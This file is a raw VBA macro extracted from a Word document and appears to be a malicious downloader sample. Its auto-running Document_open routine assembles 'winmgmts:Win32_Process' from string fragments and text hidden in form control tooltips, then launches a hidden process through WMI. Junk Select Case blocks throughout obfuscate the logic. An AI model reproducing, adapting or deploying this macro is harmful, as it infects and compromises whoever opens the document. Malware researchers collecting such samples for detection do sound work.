Attribute VB_Name = "Kgfcamrvh"
Attribute VB_Base = "0{082B6E9F-3252-4454-AF3C-805E1D34145D}{07B8DC04-AF7B-463D-8EE6-ED51FA0044BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Vacphysvpqxzo"
Function Obsmswtnpd()
   Select Case Bcbxcxjh
         Case Qltguwldt
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Ccdhzrpawdg)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Mjmfbyoyi
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Uczclaetolyay)
End Select
Jeaxpcokp = Zhlnswifcauu.Zlbbcfpg
   Select Case Imumbwofb
         Case Vlremzix
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Tarhezwjstocx)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Mfaiidtv
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Flygactzjpmdf)
End Select
Pamcqbpr = Jeaxpcokp + Kgfcamrvh.Wrcvnoaxg + Kgfcamrvh.Ezmmhofigm + Kgfcamrvh.Qhtoisiph
   Select Case Ytizdhdxot
         Case Qqliolsczcb
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Uooqvgcdecoer)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Ytyuvylsitiz
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Mvsbditohsn)
End Select
Czlgegtezfj = Pamcqbpr + Kgfcamrvh.Kbkvsahhphgkz + Kgfcamrvh.Xnadkhifxgrc.ControlTipText
   Select Case Lljjfbcbyps
         Case Kndvmqmujyuq
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Cehmoitpqzb)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Rwbcsdxkuxee
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Tcmpsaozwrddx)
End Select
Obsmswtnpd = Zrfyqakcv + Czlgegtezfj + Zrfyqakcv
   Select Case Ixdiruhc
         Case Ywdvxsazhzeet
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Lwpgvkmezqzue)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Eikwbkyjuux
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Qxedhjgyswf)
End Select
End Function
Function Lcjmkpaewip()
   Select Case Dcpqktlbqamtv
         Case Yabztjpmk
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Olzmpufpkch)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Fevzzfegwqcog
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Pnpemteabd)
End Select
Tdeoglxobcn = "wi" + "nmg" + "mt" + "s:" + "Win3" + "2_" + Zhlnswifcauu.Zlbbcfpg + "r" + "oc" + "ess" + I
   Select Case Cyzjdcwnyq
         Case Ayudrwfgzi
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Fgdxivry)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Pgljkhag
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Flslqasp)
End Select
Set Gibdyvzjfzohj = CreateObject(Tdeoglxobcn)
   Select Case Gzvpfaty
         Case Txjlueal
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Huagqgdhfm)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Mfvknslw
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Bssontiurrlbv)
End Select
Dugubeqncb = Tdeoglxobcn + Kgfcamrvh.Bvtifrtt.ControlTipText + Kgfcamrvh.Gueewbckpqtak.ControlTipText
   Select Case Ahmhpnypu
         Case Fmiykxbervalu
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Ojwrpzxflayd)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Trdvsixaem
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Trlavrcxyp)
End Select
Nuvoqwjeryubk = Dugubeqncb + Zhlnswifcauu.Zlbbcfpg
   Select Case Xihjelnhyr
         Case Ctnnlcwcrn
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Qvaziehjyzn)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Unrzeunzu
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Thpfabtjmtsjk)
End Select
Set Lcjmkpaewip = CreateObject(Nuvoqwjeryubk)
   Select Case Mliemxchuwovb
         Case Didxhbyxej
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Lxptmpzo)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Labpyyjkqqo
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Hjqqxondvnuqk)
End Select
Lcjmkpaewip.XSize = False
   Select Case Mzbmhadbw
         Case Dpftfcpe
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Hqyumaqwz)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Hrsycujp
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Jwhedzkjvnx)
End Select
Lcjmkpaewip.YSize = False
   Select Case Ihdpqgqwwkbi
         Case Adqsqrhnau
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Biqindsteu)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Smcwyyjrc
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Njwsumvhi)
End Select
Do While Gibdyvzjfzohj.Create(Null & Obsmswtnpd, Mqvemflq, Lcjmkpaewip)
Loop
   Select Case Icvnlpnu
         Case Lpoevxgslhaew
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Zysqkrzzul)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Bkfgkddhy
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Pbodgwcd)
End Select
End Function
Attribute VB_Name = "Zhlnswifcauu"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Zlbbcfpg, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Xjkvvykmmw
         Case Bvmyeiuwlvc
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Nophzuzccy)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Mifisujt
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Cmfkfcqxcgw)
End Select
   Select Case Iavbdtpxwl
         Case Svwewsceseyh
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Igpljadr)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Fynvkwcujsie
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Jzufrdbn)
End Select
   Select Case Shrptlgp
         Case Icdssjby
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
         Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Uwzkbqumrn)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
         Case Ygroqbjgt
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Drqszqbizxb)
End Select
Lcjmkpaewip
End Sub


INQUEST-PP=macro
